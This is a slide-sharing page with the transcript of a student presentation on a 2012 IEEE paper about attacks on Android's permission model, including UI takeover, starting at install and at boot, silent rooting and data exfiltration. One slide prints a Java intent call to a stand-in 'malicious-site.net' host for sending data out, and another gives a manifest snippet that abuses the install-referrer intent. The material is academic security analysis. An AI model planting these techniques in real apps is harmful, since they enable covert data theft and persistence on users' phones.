Android's Permission Model: Insights and Attacks

messing with android s permission model n.w
1 / 23
Embed
Share

Dive into the intricacies of Android's permission model based on a research paper from the 2012 IEEE International Conference on Trust, Security, and Privacy in Computing and Communications. Explore various attacks such as UI takeover, application start-ups, and data exfiltration, shedding light on the importance of app permissions in safeguarding user data.

  • Android Security
  • App Permissions
  • Data Privacy
  • Mobile Security
  • Cybersecurity
rayaanacharya
jveron Follow

Uploaded on | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

Download Presentation

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

E N D

Presentation Transcript

  1. Messing with Android's Permission Model 2012 IEEE 11th International Conference on Trust, Security and Privacy in Computing and Communications Andr e Egners, Ulrike Meyer , Bjorn Marschollek 9720114 9820117 9862218

  2. Outline 1. Introduction 2. Related work 3. Overview on Android 4. Android s permission model 5. Attacks 1. UI takeover 2. Starting Applications after Installation 3. Starting Applications at Boot 4. E.T. Calling Home 5. Silently Rooting Android 6. Conclusion 2/23

  3. I. INTRODUCTION APP Permission Model Permission Model Android Permission Model 3/23

  4. II. RELATED WORK (botnet) Inter-Application communication Permissions of Android apps 4/23

  5. III. OVERVIEW ON ANDROID Based on 2.6 Linux kernel Linux (file, memory management) Java 5/23

  6. III. OVERVIEW ON ANDROID (Cont.) 6/23

  7. III. OVERVIEW ON ANDROID (Cont.) Linux kernel process memory C library 2D/3D-graphic library SQLite... Android runtime Dalvik Virtual Machine Java Virtual Machine 7/23

  8. III. OVERVIEW ON ANDROID (Cont.) Application Framework Layer API Package Manager ( ) Location Manager ( ) View System (UI ) third-party applications 8/23

  9. IV. ANDROIDS PERMISSION MODEL API version 11,116 different permissions are predefine Ex. INTERNET allow accessing the Internet RECEIVE_SMS for monitoring, recording, or processing incoming SMS RECORD_AUDIO for recording audio messages Ex. Tetris game request Internet is reasonable but suspicious if it would also requested the permission to read the address book 9/23

  10. URI Permissions Uniform Resource Identifier Applications may wish to pass a URI to another application in order to be able to exchange data. For example, an email application usually protects its emails from being read by other applications using additionally defined permissions. a third-party image viewer should not hold the permissions to read emails directly. image viewer should rather be handed a URI to the data by using the Intent.FLAG_GRANT_READ_URI_PERMISSION flag set by the callee of the function. This enables the receiver, i.e., the image viewer, to read the data at the given URI. 10/23

  11. Permission protection level Level zero normal permissions ,low risk setting timer, making the phone vibrate the user can request to be notified of the permission request prior to the installation of the application. Level one dangerous permissions ,high risk initiating phone calls, access to the device s sensors, the Internet, or sensitive user data, read log file Prior to the installation, installer displays the set of requested dangerous permissions to the user, which decides to either grant or deny the set permissions Only if the user gives his consent to all of the requested permissions, the application can successfully be installed. 11/23

  12. Permission protection level (Cont.) Level two signature permissions only if the requesting application is signed with the same certificate as the application that declared the permission user agree but no signature cannot be granted Level three signatureOrSystem only to applications that are in the Android system image or that are signed with the same certificates . 12/23

  13. Permission protection level (Cont.) some flaws the user is only able to grant or deny all permissions at once. granting or denying a particular permission is not possible. refraining from installing an application which might be useful, but requests too many or a suspicious set of permissions. Tetris example 13/23

  14. Known Vulnerabilities Log permissions FAT32 formatted SD cards WebKit browser Most uncovered the past years 14/23

  15. V. ATTACKS An attack path to silently root android 1. Taking over the UI 2. Starting directly after installation 3. Also starting at boot 4. Two-way Internet communication 5. Silently rooting the device 15/23

  16. 1.UI takeover KeyIntercepter - onKeyDown() : handle or pass - handle them but doing nothing The Home button - Return to Home screen or Show a list of the recently used Installing from Android Market - The install button -??-> The OK button 16/23

  17. 2.Starting Applications after Installation Would the user start the app? to receive the INSTALL_REFERRER intent - Google Analytics SDK - chosen by the attacker 17/23

  18. 2.Starting Applications after Installation (Cont.) <receiver Android:name= com.google.android.apps.analytics.AnalyticsReceiver Android:exported= true > <intent-filter> <action android:nace= com.android.vending.INSTALL_REFERRER /> </intent-filter> </receiver> 18/23

  19. 3.Starting Applications at Boot BOOT_COMPLETED intent Permission RECEIVE_BOOT_COMPLETED is introduced to prevent from illegitimately starting at system boot... but is forgotten Successfully listenning for the intent without asking for permission 19/23

  20. 4.E.T. Calling Home Establishing bidiectional outside communication e.g. a specified dropzone delivering user data or a command & control server of a botnet -----------------------------VIEW intent----------------------------------------- ---- startActivity(new Intent(Intent.ACTION_VIEW, Uri. Parse(''http://malicious-site.net'')). setFlags(Intent.FLAG_ACTIVITY_NEW_TASK)); 20/23

  21. 4.E.T. Calling Home (Cont.) Request HTTP GET to send data URI schemes : deliver data to applications SilentCommunicator - screen off: start the transmission - screen on: browser hide 21/23

  22. 5.Silently Rooting Android modified zimperlich-jailbreak:each instance runs with root privileges setuid() calls which intended to change the owner to the user but has been assigned to the calling application -> fail infinite loop which executes the native code until exception Root user can install app and the device owner will not notice! 22/23

  23. VI. CONCLUSION Android 23/23

Related


Aarti Group Corporate Presentation and Company Overview

Aarti Group Corporate Presentation and Company Overview

rhoda
Supervising groups: a focus on the practical.

Supervising groups: a focus on the practical.

baylor
NAMI Family Support Group Model Overview

NAMI Family Support Group Model Overview

bertie
Elan Developer|Elan Group|-Transforming Gurgaon With Remarkable Projects

Elan Developer|Elan Group|-Transforming Gurgaon With Remarkable Projects

elan1
What is the Process for Group Booking with JetBlue Airlines?

What is the Process for Group Booking with JetBlue Airlines?

Flights1
Combined Civil Service Group-1 Examd Eligibility criteria

Combined Civil Service Group-1 Examd Eligibility criteria

OBCRIGHTS
Group-II Combined Civil Service Examination-II Eligibility

Group-II Combined Civil Service Examination-II Eligibility

OBCRIGHTS
Therapeutic Factors in Group Therapy: Enhancing Interpersonal Relationships

Therapeutic Factors in Group Therapy: Enhancing Interpersonal Relationships

aida
Group Dynamics and Its Impact on Collaboration

Group Dynamics and Its Impact on Collaboration

jaylen
The Impact of Arrogance and Polarization on Group Deliberation

The Impact of Arrogance and Polarization on Group Deliberation

reshma
Overview of Group 16 P-Block Elements

Overview of Group 16 P-Block Elements

rayna
The Components of Social Group Work

The Components of Social Group Work

constantine
Termination Phase in Group Work

Termination Phase in Group Work

bobbi
Group Decision-Making: The Wisdom of Crowds and Stupidity of Herds

Group Decision-Making: The Wisdom of Crowds and Stupidity of Herds

elin
Mastering Group Discussions for Effective Communication and Decision-Making

Mastering Group Discussions for Effective Communication and Decision-Making

bree_aun
Role of Advisory Group in AMICI Steering Committee Deliverables

Role of Advisory Group in AMICI Steering Committee Deliverables

rum_w
Progress Report of AFROSAI Working Group on Environmental Auditing Activities

Progress Report of AFROSAI Working Group on Environmental Auditing Activities

drak_ick
Enhancing Group Communication and Facilitation Techniques

Enhancing Group Communication and Facilitation Techniques

jage529
Comparative Analysis of Male Students in Group A and Group B

Comparative Analysis of Male Students in Group A and Group B

tate_9
Baltic Sea North Sea MSDI Working Group Report

Baltic Sea North Sea MSDI Working Group Report

juan464
Washington Group and Brazzaville Group Meeting on Disability Statistics

Washington Group and Brazzaville Group Meeting on Disability Statistics

jades
Role Descriptions and Team Structure for Organization Operations

Role Descriptions and Team Structure for Organization Operations

aaidyn

More Related Content